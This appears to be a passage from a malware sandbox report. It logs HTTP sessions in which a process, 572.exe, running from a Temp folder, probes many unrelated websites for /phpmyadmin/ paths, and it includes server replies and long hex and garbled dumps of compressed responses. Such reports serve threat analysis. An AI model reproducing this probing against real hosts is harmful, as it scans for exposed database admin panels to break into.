                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 63 61 64 65 6d 69 63 6f 2e 75 6d 2e 65 64 75 2e 6d 78 2f 61 63 61 64 65 6d 69 63 6f 2f 70 68 70 6d 79 61 64 6d 69 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 63 61 64 65 6d 69 63 6f 2e 75 6d 2e 65 64 75 2e 6d 78 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://academico.um.edu.mx/academico/phpmyadmin/">here</a>.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at academico.um.edu.mx Port 80</address></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                300192.168.2.657553104.26.14.18080524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.872972965 CET186OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: aeaaamorim.inovarmais.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:54.002130985 CET662INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:53 GMT
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: max-age=3600
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 05 Feb 2024 12:14:53 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: https://aeaaamorim.inovarmais.com/phpmyadmin/
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=L6SUJFt0qLhNUzOHW3K1bakxAQ3fNT1mYbZ8EdTpscdKyuGo4NOHWC2an%2FInILbspv428VnZDlXt3PDB%2B0oWQHuZ6HHbfh7gJksrpd5uOFPTcIMFJdcCkGMsjeGqiKWKpE7tadQBuqexzVw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abb7f0c8ab087-ATL
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                301192.168.2.65773331.13.65.780524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:54.723061085 CET180OUTGET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: lookaside.fbsbx.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:54.824800014 CET214INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Location: https://lookaside.fbsbx.com/phpMyAdmin/
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/plain
                                                                                                                                                                                                                                                                                                                                                                Server: proxygen-bolt
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:54 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                302192.168.2.657695103.224.182.21080524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:54.723145962 CET180OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: followerstiktok.xyz
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:54.883073092 CET348INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                                                date: Mon, 05 Feb 2024 11:14:54 GMT
                                                                                                                                                                                                                                                                                                                                                                server: Apache
                                                                                                                                                                                                                                                                                                                                                                set-cookie: __tad=1707131694.6185485; expires=Thu, 02-Feb-2034 11:14:54 GMT; Max-Age=315360000
                                                                                                                                                                                                                                                                                                                                                                location: http://ww16.followerstiktok.xyz/phpmyadmin/?sub1=20240205-2214-549f-9760-a2fba92ef7f3
                                                                                                                                                                                                                                                                                                                                                                content-length: 2
                                                                                                                                                                                                                                                                                                                                                                content-type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                connection: close
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 0a 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii:


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                303192.168.2.65772354.183.63.24180524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:54.723151922 CET179OUTGET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: pt.secure.imvu.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:54.903379917 CET1286INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:54 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.17.9
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.4
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: osCsid=3d56c00b3a8b97318c69b3bcd402d268; expires=Mon, 04 Mar 2024 11:14:54 GMT; Max-Age=2419200; path=/; domain=.imvu.com; HttpOnly
                                                                                                                                                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: osCsid=3d56c00b3a8b97318c69b3bcd402d268; expires=Mon, 04 Mar 2024 11:14:54 GMT; Max-Age=2419200; path=/; domain=.imvu.com; secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                                                                                                                                                x-imvu-rnd: DL5kI03G4GbOn9bDoAu5aSI5S6j7XuU
                                                                                                                                                                                                                                                                                                                                                                content-language: pt-br
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 31 32 34 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 3b db 6e db 48 96 ef 06 e6 1f aa 99 ee 96 d4 23 8a d4 c5 b2 24 db 1a c8 97 74 b2 93 38 d9 38 c9 f4 20 1b 18 45 b2 28 d1 21 59 0c ab 68 4b ed c9 c7 0c f6 61 30 0b ec d3 60 5f f6 d5 3f b6 e7 14 49 89 94 a8 c4 e9 56 37 d6 84 ac 72 5d ce fd 56 c5 f2 d1 37 67 2f 4e 5f ff f5 e5 39 99 c9 c0 1f 1f 7d a3 eb ef 3c 97 3c 3d 27 83 f7 63 92 ff 1c e1 20 71 bc f8 58 f3 65 ac 11 9f 86 d3 63 8d 85 fa 9b 4b 8d d8 3e 15 e2 58 f3 d8 40 1b 93 a3 6f de b1 d0 f1 dc f7 ba 5e 04 36 fc 6a 60 c3 2d c0 a6 32 83 87 1d e3 6a 58 91 d4 ad 58 ad d7 f5 22 8c bd a3 19 a3 ce 78 4f 51 11 30 49 81 69 19 e9 ec 63 e2 dd 1c 6b 3f e9 6f 26 fa 29 0f 22 2a 3d cb 67 40 0b 0f 25 0b e5 b1 f6 f4 fc 98 39 53 e8 31 b6 ad 3d 4d a7 ea af 17 51 71 a1 64 73 69 20 89 87 c4 9e d1 58 30 79 fc e6 f5 63 7d b0 06 29 a4 01 3b d6 68 14 f9 4c f7 64 12 32 a1 c3 1f 05 38 f0 97 ee 39 c7 c3 f6 f0 a0 b7 3f e8 f5 9a 04 7b 68 3c 4d 02 1c 47 4a c4 c8 30 22 d9 12 cc 4e 62 d6 f2 82 9b a4 65 f3 c0 08 91 82 3f 09 9e c4 36 3b b6 68 18 b2 58 21 2f 22 9e 72 3e 05 cc 91 4f 17 d5 78 01 50 0a 31 e0 96 e7 33 9b c7 0e bf a1 1b 70 52 06 d2 39 fa 2d b3 10 98 6e d3 88 96 a5 b9 60 e2 61 4b 85 a4 32 11 ba 45 63 68 2e 4a 30 2c 9f da 1f 74 19 d3 50 f8 89 0d 5d ff 0f 89 f1 bd f0 03 89 99 9f 03 94 3c b1 67 ba 07 cb 34 22 bc 9f 19 98 f9 fe c1 7c ff 40 23 b3 98 b9 c7 1a 6a 11 94 b8 ae 41 f8 04 3c 34 6e 3d 39 0b 98 e1 05 53 c3 a5 37 08 c5 58 07 ab 2b 70 ad 28 9c 3e 98 80 be 39 ef 9b bb 23 40 81 fb 2a 02 0e 3a f3 83 ce ee 08 50 e0 be 8e 80 fe fc a0 bf 43 02 10 dc 57 11
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 1242;nH#$t88 E(!YhKa0`_?IV7r]V7g/N_9}<<='c qXecK>X@o^6j`-2jXX"xOQ0Iick?o&)"*=g@%9S1=MQqdsi X0yc});hLd289?{h<MGJ0"Nbe?6;hX!/"r>OxP13pR9-n`aK2Ech.J0,tP]<g4"|@#jA<4n=9S7X+p(>9#@*:PCW
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:54.903392076 CET1286INData Raw: d0 6e f7 e6 f0 d9 1d 09 19 c0 af 23 a2 63 ce e1 b3 43 22 52 80 5f 47 44 0f 08 ef ed 52 12 29 c0 af 23 62 bf 33 87 cf 0e 89 48 01 7e 1d 11 03 90 de 60 97 ea 48 01 56 11 91 22 96 90 b8 a0 1d d0 29 33 d4 a4 5f 88 39 fb d6 bb 9d 79 37 e3 39 e3 49 f5
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: n#cC"R_GDR)#b3H~`HV")3_9y79I>CWB>a^ist{5!Iy,<2!1@Z ebci'<:Z+EJW-x$N;t{p3WF\xZd=2%F-(X[\J
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:54.903403997 CET1286INData Raw: 93 fe e9 b0 62 ff 90 39 f9 d2 bb 53 6f 07 cd 9b a8 7d 70 dd a6 0b bb e1 7a 06 a0 d1 94 bc fe a8 3b 9c 0c 4f 4e 1a 5f b5 1d 49 d7 37 f3 b5 eb e1 7f 5b 25 fa 40 a7 da 1e b0 ab a6 6d 04 6e e0 f6 81 b0 95 3a 1e 86 20 d5 5c d1 35 3b 93 d3 83 f3 76 19
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: b9So}pz;ON_I7[%@mn: \5;v-lXakGfqd{gCzqc3{%(\pI#F2"O}sd/{$vYCu/>L:6]fc[a%8Z/l]m+tOV}#DD]
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:54.903415918 CET1286INData Raw: 5e fa 49 ef 98 41 c1 f2 87 6c 5d 14 43 ca 88 e5 e2 58 e3 d3 11 ec 6a a9 5f 9e 7e b5 9c 6e a4 b7 d0 8e 90 a3 fc c2 1b 6c 04 6e 9d f4 9a 16 51 fb 2b a8 c3 a6 7a 24 35 98 e7 78 37 f9 b4 98 4d f5 d5 96 0c f6 09 58 a3 1d 6b 5a 76 9b 6c 6d 66 ba d7 66
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ^IAl]CXj_~nlnQ+z$5x7MXkZvlmffV;zh`V6E\+hWg`x67uK"#P&h-,&NXZS]PyH~COV@\BSJ FW@nBsQ0JHd!fBi@e,>}
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:54.903426886 CET312INData Raw: 08 b6 bd 5d 78 9e 05 06 5f 64 e1 04 fe de 85 d1 af c9 46 dd e1 b4 25 5a bc 6a 30 3d dc b5 d5 29 8c 06 a6 9d ab e7 f8 c2 e4 cf 9e bc ea 98 f8 6f 1e 8e ab 8d 27 61 02 05 c4 8e 63 fa 35 b7 30 52 9d a3 13 4f 77 13 73 4b 7e 54 28 f0 04 75 99 5c c0 e6
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ]x_dF%Zj0=)o'ac50ROwsK~T(u\8f;-.4$9j\m~W(DyP`C1;=Ul5&oi*Rm7o_Se+WEI?hw:d"NbLlu`m#=.


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                304192.168.2.657901192.185.5.2380524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:54.723330021 CET175OUTGET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: multiideas.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:54.898683071 CET1286INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:54 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.23.4
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html;charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding,User-Agent
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                X-Server-Cache: true
                                                                                                                                                                                                                                                                                                                                                                X-Proxy-Cache: MISS
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: PHPSESSID=764ba9814f7f85e15ff60014b081960c; path=/
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 34 31 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec b2 6b 73 23 c9 95 25 f8 b9 d2 6c ff 83 57 c8 5a 95 39 4a 0f 84 3f c3 a3 8a a0 4c 55 ad de ee b1 66 8f 4c 8f 69 5b 53 c9 c6 40 20 92 88 aa 20 40 00 41 30 49 a9 fe fb 9e 73 3d 00 46 b2 52 a5 ec 69 cd ec ae d9 a6 31 1d 37 dc ef e3 dc 73 ce c5 e7 ff f8 df be f9 fd ff f5 9b 5f ab f5 70 db 5f be ba e0 8f ea 17 9b 9b 79 d1 6e f4 1f 7e 57 a8 65 bf 38 1c e6 c5 66 ab bf 3b 28 9c 87 e3 4d c1 c4 76 b1 c2 cf 6d 3b 2c d4 72 bd d8 1f da 61 5e fc e1 f7 ff a4 53 71 ba de 2c 6e db 79 71 ec da 87 bb ed 7e 40 a7 ed 66 68 37 48 7b e8 56 c3 7a be 6a 8f dd b2 d5 f2 f1 56 75 9b 6e e8 16 bd 3e 2c 17 7d 3b 37 6c d2 77 9b ef d5 be ed e7 c5 dd 7e fb ae eb db 42 ad f7 ed bb 79 31 9b dd dc de dd 94 db fd cd ec fd bb cd cc 30 fb d5 c5 61 b9 ef ee 86 cb d7 ef ee 37 cb a1 db 6e 5e 73 97 37 7f e6 59 ca 12 ff 06 3c 6a ae 3e bc 28 f7 ed 5d bf 58 b6 af 67 df 5e cb 8e df 5e cf de 7e f1 dd e1 8b 37 3f bc 79 bd da 2e ef 6f 01 b9 3c 05 bf ee 5b fe bc f9 ea 62 36 8e 7b 75 31 74 43 df 5e 5e dd f7 43 a7 fe 65 d5 2e 0e ea e7 3f 4b d6 98 af d4 7f bd 3f 0c 6a b1 d9 0e eb 76 af fe 7d bb 5f fd 66 df 1e 0e ea d0 0d ed c5 2c 97 4d b6 fc 62 b5 39 e8 3b 2c d8 0e cb f5 17 79 d5 2f 66 b3 77 60 ed 50 de 6c b7 37 7d bb b8 eb 0e e5 72 7b fb 85 9a 7d 42 e5 a1 7c 20 47 93 e4 17 3d 0f c3 62 e8 96 b9 e1 72 bf 3d 1c b6 fb ee a6 db e4 9e e8 07 c1 36 ed 72 78 31 ad 58 f4 43 bb df 2c 06 e8 31 3c de 41 e2 c5 dd 5d df 2d 17 24 7d b6 3f 1c 7e f1 fe b6 c7 13 f7 9b 17 1f f0 b2 5f ec ee b7 5f a9 7f 6a db d5 b3 96 b7 cc e8 98 40 24 b3 6e b3 6a df 97 77 eb bb d9 3b a4 cd 8a bf f7 f0 6f b6 b7 94 f0 f0 a9 28 96 63 fe 14 ce e7 5a ab df af bb 2c a5 ba 3f b4 07 05 8d d5 ff 29 22 a9 5f 6d 16 fd 23 88 3d a8 eb 47 75 b5 dd 1c 80 f8 5f 36 87 ee 66 8d a9 77 fd 3d 29 3e d6 65 5d 1a a5 d5 1f 0e dd e6 66 52 32 ec 17 cb ef 79 a5 d5 6c f6 f0 f0 50 de e6 06 dd d8 40 d0 29 ad 2f ff 8f 0c e3 df b6 43 fb e5 8f a6 00 1a 6c a7 96 f7 fb 3d b0 f7 8f 0a 52 be eb 6e ee f7 ed 4a 6d 37 00 3b 62 2f b1 46 9b b7 d8 3e 6c e0 d2 0d 96 04 88 ad 5a dc 63 a3 cd 40 66 5b f5 d0 0d eb 1f 6f d7 6d 64 eb 97 b3 0f ed 30 60 01 ac ba d8 b4 7d 49 ac 27 a8 ea 0f bf 02 92 55 cb 9c c9 0e b3 4f 62 4e f2 3f fb ec e2 b0 dc 77 77 c3 a8 fe d0 be 1f 66 df 2d 8e 8b 7c 5b 5c 22 e3 b3 07 a8 b7 7d 28 ff c7 c3 5d 7b bb fd ae fb dd 09 d0 5c fd b9 b8 5e 1c da 3f ec fb e2 cb 62 3d 0c 77 87 2f bf 9d 7d 3b 3b 94 0f e5 76 7f f3 ed ac bb 5d dc b4 87 6f a1 f9 be fd 76 26 c5 df ce 8c 29 6d 59 7d 3b ab ed fb da 7e 3b 2b de 16 98 89 fa f2 6e 73 83 8f c3 f1 e6 7f ae 1f 0a a5 1b 7e 7f 9d 1b 22 e2 f7 f6 7e bf 6c 8b 2f ff 5c 40 34 d2 cf b2 b1 bf b4 ff d0 aa df ce 1e ee 74 b7 59 f6 f7 2b 8e fa ee 20 17 52 a4 f7 6d 8f ac b6 bc ed 36 e5 77 87 5f 1e db fd 3c 94 a6 34 c5 0f 3f 7c 45 a2 3e 7f 77 bf 59 0e dd 76 f3 7a f1 f6 fa ed f2 cd 9f 4f df 6a c5 9b 37 7f 3e 2e f6 6a 39 ff dd 00 fb dd 94 ef f6 db db 6f d6 8b fd 37 50 f0 ab be 5c a2 f7 fe b7 ed 72 78 5d bd ad de 7e 5f 3e 74 ab
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 413ks#%lWZ9J?LUfLi[S@ @A0Is=FRi17s_p_yn~We8f;(Mvm;,ra^Sq,nyq~@fh7H{VzjVun>,};7lw~By10a7n^s7Y<j>(]Xg^^~7?y.o<[b6{u1tC^^Ce.?K?jv}_f,Mb9;,y/fw`Pl7}r{}B| G=br=6rx1XC,1<A]-$}?~__j@$njw;o(cZ,?)"_m#=Gu_6fw=)>e]fR2ylP@)/Cl=RnJm7;b/F>lZc@f[omd0`}I'UObN?wwf-|[\"}(]{\^?b=w/};;v]ov&)mY};~;+ns~"~l/\@4tY+ Rm6w_<4?|E>wYvzOj7>.j9o7P\rx]~_>t
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:54.898694992 CET1286INData Raw: 61 8d df 75 4b bd de bc ed cb 77 5d df ff 1e 64 bd 5e 96 8b bb bb fe f1 35 7d f7 76 f1 06 e9 d5 9b af d8 7b 35 ff be 1c b6 ff b8 18 16 7f f8 ed bf be 7e f3 9f e8 7a 3d e9 da be e8 ba 6f 87 fb 3d 76 9a cf e7 ed 0f e7 0d 0a 31 61 34 65 0d 0a 15 db
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: auKw]d^5}v{5~z=o=v1a4eWWnX_%5+fE*{}%2wrlzz\oCL)6~l>x~?A96irocW}<k>I_d7z`_Jh
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:54.898710966 CET1286INData Raw: db 2c fb fb 55 2b e3 be db dd b7 fb c7 f1 e7 34 16 12 db d2 7f 30 f7 ef 3d 4a df 76 37 fb c5 d0 96 b7 dd e6 79 ac 87 b7 a6 53 9f 4d 33 9b 2d ee ba f2 a1 dc ee 6f 66 5f fc 35 63 74 9b 55 fb be bc 5b df 71 f4 77 87 ed 66 96 25 3d b7 29 7e bd ea 86
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ,U+40=Jv7ySM3-of_5ctU[qwf%=)~?_Hb?~S7xBnIDYbCptA<7)fv^]BmpnZj~}{8PB0vP/~_U%~h1"/u~,i.
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:54.898722887 CET1286INData Raw: d8 bc 3c 4f ca 4c ff 35 05 70 9d d7 3a 93 92 37 ff b1 3e d2 70 5c 5a 7e 3f ca 37 dc 94 2f 0f cb 7d 77 37 a8 e1 f1 ae 9d 7f 31 b4 ef 87 d9 77 8b e3 22 df 7e 71 f9 6a f6 5f d4 c5 e7 7f fc e6 1f 7f f5 fb 5f fd 51 fd 97 d9 ab e3 62 af 86 07 b4 7e 3c
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <OL5p:7>p\Z~?7/}w71w"~qj__Qb~<Gw=j\8oF-:Q<<}w-b-[}jno-."|[#-/z3@ogtYw.,/Prlv{]jr==^P4p}w
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:54.898735046 CET1286INData Raw: 0e a6 9e a7 63 07 99 b8 e3 10 80 ad a6 30 86 4f c7 b1 33 f4 26 48 39 f7 c4 fb 79 98 e0 49 f4 a4 32 b1 f4 b6 39 52 d8 86 62 b2 69 10 39 6b 83 b6 b6 0a 9c da 00 2a 2c 15 ec 5a 9b a6 4c a1 26 3e e0 17 7c 55 45 a7 61 1c 6d 17 6c 8d 09 36 1c 0d 1e 4c
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: c0O3&H9yI29Rbi9k*,ZL&>|UEaml6LuL4,zKL(pd9f%4q^b1<9uru*c>Dsv&g'|E!UNgeZSy>:q*Alaaa;;h|C.XXF.J
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:54.898747921 CET1286INData Raw: 20 bf 93 e5 f1 83 4f da 2c 51 71 60 18 cd 6e 65 19 43 49 55 96 ce 8a bc 86 3c f4 3a c2 43 da d0 5a 62 7c 23 62 47 c1 e5 64 63 53 51 da da d9 71 1b 27 4e 85 42 4d 1a 7c 59 55 34 41 10 a7 72 8f 93 53 c1 37 cf 4a 36 16 5d b9 53 06 1e 4a 1f a8 20 9d
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: O,Qq`neCIU<:CZb|#bGdcSQq'NBM|YU4ArS7J6]SJ u-;#m7$;<$OULJ<lgG6CvQ;-I`XKGqMVdR3Ht3nsbX_o=n5/v-k
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:54.898757935 CET386INData Raw: 8a 22 32 81 05 d8 7c d0 f2 93 95 db e1 a5 a1 41 f3 65 ce eb 75 2c 8d 0d 3c ab 7a 07 e4 14 d4 8a a0 35 1f c6 d8 66 1e a1 66 4a b4 43 d3 98 21 4b 8b 27 ba 22 9f f9 46 9e 73 aa 9a c6 93 1c 35 a9 55 93 a6 6a 52 95 73 72 95 3a 65 66 33 9d 33 b1 b4 93
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: "2|Aeu,<z5ffJC!K'"Fs5UjRsr:ef33l1QS43coZ}i71i6N&^JEHW:&$M<'F8cE<%T^Zz\uO!j{AK \Mq7wSY
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:54.898770094 CET1286INData Raw: 35 61 63 0d 0a eb d3 d3 15 f8 a8 4b 6f a1 5f c3 1f 70 90 bd c7 9c 06 bb 57 06 dc cb 8f 92 ab 67 32 25 0f 64 ca 63 ce 1f f2 4f be 82 bf c7 96 a7 d4 e7 b7 61 52 74 32 c5 98 a4 26 c3 86 09 8a a7 e2 f2 62 76 b7 18 d6 97 af 2e 66 87 c7 db eb 6d 8f 28
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 5acKo_pWg2%dcOaRt2&bv.fm([ne=:vb-j`l+d2~r102Pr1rCxKp{sZ0<?CU*:S>N?4eM
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:54.898782969 CET1286INData Raw: 9f c6 a1 2d 57 ab 8d cf 7d 77 da 8b 1b 0d 29 d0 51 ac e2 cb 26 84 81 66 36 51 27 4e 84 a5 5d 59 a3 41 d6 27 92 c9 c1 0b 22 39 95 dc 68 79 7d ba 0a b2 82 35 65 93 ec 4e 28 d6 32 eb 7c 82 3b 7d 52 37 bf 66 70 95 8b f9 e6 bc 73 3e 6d 46 2b 12 98 aa
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: -W}w)Q&f6Q'N]YA'"9hy}5eN(2|;}R7fps>mF+h4hg-yqjgS<C:)|%got:;g1s*Q_&eMyK>]2S|V=S61f$_I|"G1-6hy4',@U?]5B&%#
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:54.898798943 CET461INData Raw: 53 ec 8d 11 3f 8c 4b 36 ee a8 03 45 d9 c9 47 be 52 93 67 95 cb 2b 35 69 f3 74 65 1d 6b 64 9e b3 47 a4 5b b3 86 c4 b1 aa 8f 5a be 76 d5 d9 36 d9 03 88 47 3a 25 7e ba 8a 34 b7 32 89 c0 d7 a6 6c 8c 39 b2 43 dd ac 01 08 f4 1e f3 07 dc 53 87 a3 11 9b
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: S?K6EGRg+5itekdG[Zv6G:%~42l9CSNite2)"F3GQ6SV&Dvd>3sY:bgxp>M1T212CM!lo,dL9jW9'cItc9 p$-aw36PJR/wc!
